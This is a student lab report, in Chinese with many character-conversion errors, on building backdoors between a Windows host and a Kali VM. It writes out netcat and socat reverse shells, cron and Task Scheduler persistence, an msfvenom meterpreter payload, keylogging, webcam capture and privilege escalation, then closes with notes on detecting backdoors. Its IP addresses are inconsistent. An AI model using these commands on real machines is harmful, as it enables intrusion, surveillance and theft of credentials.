20145221高其_後門原理與實踐
20145221高其_後門原理與實踐
實驗目錄
實驗準備
- 後門:後門程序就是留在計算機系統中,供某位特殊使用者經過某種特殊方式控制計算機系統的途徑。後門包括從簡單到奇特,有不少的類型。簡單的後門可能只是創建一個新的帳號,或者接管一個不多使用的帳號;複雜的後門(包括木馬)可能會繞過系統的安全認證而對系統有安全存取權。例如一個login程序,當你輸入特定的密碼時,你就能以管理員的權限來存取系統。
- 工具儲備:
- cron:
- cron是一個linux下 的定時執行工具 ,能夠在無需人工干預的狀況下運行做業。
crontab -u //設定某個用戶的cron服務,通常root 用戶在執行 這個命令的時候須要此參數
crontab -l //列出某個用戶cron服務的詳細內容
crontab -r //刪除 沒個用戶的cron服務
crontab -e //編輯某個用戶的cron服務
實驗過程
windows主機與kali虛擬機實現互聯互通
- 首先在win主機上下載ncat軟件,併爲其配置好環境變量,用於在cmd的使用
- 打開虛擬機,輸入指令
ifconfig
,查看其IP地址,並ping一下win主機,觀察是否能ping通
- 在本實驗中,
win_IP:172.30.6.85
,linux_ip:192.169.18.128
- 上述幾步是必要準備步驟,該項任務較爲簡單,不作過多贅述,接下來只需在一個系統開啓監聽端口,在另外一臺虛擬機開啓請求鏈接便可
- windows開啓監聽端口:
- kali發起鏈接請求:
使用netcat獲取主機操做Shell,cron啓動
Windows得到Linux的Shell
- 在windows上打開cmd,並經過ncat開放端口5221
- 在linux上反彈鏈接win:
nc 169.254.1.65 5221 -e /bin/sh
- 固然除此ls命令,還可使用mkdir、cp等經常使用命令
- 使用cron開啓Linux定時鏈接:
- crontab指令增長一條定時任務,
-e
表示編輯,接下來會進入編輯狀態,在最後一行參照以前的格式加入一條自動執行netcat的指令便可,以下圖
- 設定57分時自動開啓,因此當主機時間到了57分時,就能夠獲取kali的shell了
- 使用任務計劃程序開啓Windows定時鏈接:
- 在
控制面板->管理工具->任務計劃程序
中添加任務
- 在「操做」中新建一個操做,寫入參數:
-e cmd.exe 192.168.6.85 5221
而後可根據須要設置條件便可。html
Linux得到Windows的Shell
- 同上述操做,在linux下設置監聽端口:
nc -l -p 5221
- 在windows下請求鏈接:
ncat 192.168.18.128 5221 -e cmd.exe
- 在linux下輸入
ipconfig
查看主機IP:
使用socat獲取主機操做Shell, 任務計劃啓動
- 下載安裝socat軟件,下載地址
- 爲其配置環境變量
- 在windows上開放
5221
端口,並把cmd的stderr
重定向到stdout
socat tcp-listen:5221 exec:cmd,pty,stderr
- 在linux開啓監聽:
socat - tcp:172.30.6.85:5221
- 以下圖,能夠發現成功鏈接到kali虛擬機:
使用MSF meterpreter生成可執行文件
- 經過meterpreter生成後門程序:
20145221.exe
- linux下輸入指令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=80 -f exe > 20145221.exe
- 接下來須要將這個後門程序傳到咱們的靶機上,能夠經過ncat來實現
- 首先我在win的cmd下使用
ncat.exe -lv 443 > 20145221.exe
命令在443號端口進行監聽
- 而後在Linux下使用
ncat -nv 172.20.10.2 443 < 20145221.exe
命令把文件傳送過去
使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權
- MSF打開監聽進程
msfconsole
:進入msf
use exploit/multi/handler
:進入handler模式
set payload windows/meterpreter/reverse_tcp
:設置payload
show options
:查看當前信息狀態
set LHOST 192.168.18.128
:設置LHOST
set LPORT 80
:設置LPORT
exploit
:MSF開始監聽
- 在windows下打開運行
20145221.exe
木馬程序,此時殺毒軟件可能會報毒,點擊找回文件並添加到信任區便可,而後就能夠在linux攻擊機上取得靶機的shell了
- 經過
help
查看可使用的指令:
- 經過
screenshot
進行屏幕截圖:
- 經過
getsystem
提權:
- 經過
keyscan_start
和keyscan_dump
來記錄靶機的鍵盤輸入:
- 經過
webcam_snap
捕捉鍵盤記錄
- 經過
run metsvc
爲主機安裝一些系統服務
可選加份內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell,加份內容一併寫入本實驗報告
實驗思考
例舉你能想到的一個後門進入到你係統中的可能方式?
- 有時候咱們須要下載一些工具軟件,在網絡中搜索時,每每靠前的匹配項不是官方提供的連接,當咱們經過這樣的第三方平臺下載的軟件,就頗有可能經過咱們的主動點擊下載安裝到本身的主機上,使本身的電腦感染木馬病毒。
例舉你知道的後門如何啓動起來(win及linux)的方式?
- win:首前後門可能做爲一個exe文件藏在咱們的主機下,而後能夠經過誘導用戶主動點擊、修改註冊表、添加到開機自啓動項、或者和咱們經常使用的軟件綁定在一塊兒同時啓動,具備很高的隱蔽性。
- linux:linux中能夠經過crontab功能將木馬設爲定時啓動,也能夠經過對正常軟件的綁定注入shellcode達到開啓後門的目的。
Meterpreter有哪些給你映像深入的功能?
- Meterpreter功能強大,一旦能夠控制靶機,就能夠實現許多功能,這些功能在本次實踐中看似有趣,可是在現實生活中,卻對咱們的隱私和安全都是一大威脅。
- 好比,當咱們在登陸QQ時,若是木馬已經啓動,就能夠監測咱們鍵盤錄入,竊取QQ密碼;又好比,一些不法分子能夠經過盜取主機權限入侵攝像頭,對自身與家庭的隱私會有極大傷害。
如何發現本身有系統有沒有被安裝後門?
- 首先,咱們能夠經過計算機的入侵檢測系統以及防火牆,對系統的行爲有一個全面的檢測,在必定程度上能夠避免被裝後門;
- 其次,能夠經過殺毒防禦軟件對計算機進行保護,檢查是否有後門,按期更新病毒庫,養成查殺電腦的好習慣;
- 最後,咱們能夠手動查看任務計劃程序、開機自啓動項中查找有關可疑程序。
參考資料
歡迎關注本站公眾號,獲取更多信息